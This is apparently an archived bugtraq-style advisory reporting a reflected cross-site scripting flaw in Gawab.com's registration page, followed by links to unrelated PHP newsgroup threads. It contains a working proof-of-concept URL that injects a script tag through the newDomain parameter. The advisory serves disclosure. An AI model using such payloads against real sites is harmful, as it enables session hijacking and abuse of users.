Gawab.com Register Xss Bugtraq

Script: Gawab.com Mail Services Portal System

Version: ?

Language: PHP

Problem: Xss

Vendor: http://www.HackMaster.Us

Discovered by: rootter(at)hackmaster(dot)us

Example: http://gawab.com/webfront/register.php?formAction=start&newDomain=i%20found%20a%20xss%20vuln.%20%20%3Cscript%3Ealert(%22Security%20testing%20by%20R00TT3R%20:)%22);%3C/script%3E

Relevant Pages

  • Re: Breaking backwards compatibility - good or bad?
    ... coming and are needed to anything really big and useful in PHP. ... command or statement in the language that is going to be made invalid ... The PHP team tries very hard not to break CORRECT scripts. ... "Introducing case-sensitivity for variables and functions names has ...
    (comp.lang.php)
  • Re: Case sensitivity in programming languages.
    ... the language. ... And these conventions take advantage of case sensitivity. ... In PHP it can be any of those things. ... group of programmers who want t force their stupid ideas onto others. ...
    (comp.lang.php)
  • Re: A Lot of Questions from a Noob
    ... OOP is a language paradigm that is not specific to ... I Google'd for an introduction to object-oriented programming, ... Watch out for the die-hard Perl fanbois: ... PHP 5 OOP has come a long way from PHP 4. ...
    (comp.lang.php)
  • Re: Wordpress Port
    ... I think Ruby is also generally useful. ... easier to work with than Perl. ... PHP was obviously designed ... primarily as a procedural language, so it's sort of appropriate for ...
    (comp.lang.ruby)
  • Re: Operator precedence
    ... Where in the PHP manual does it say ',' is an operator? ... may add some things you cannot do, but the language itself doesn't. ... The grammar permits 1 = 1, ... often used to refer to the first C standard, ...
    (comp.lang.php)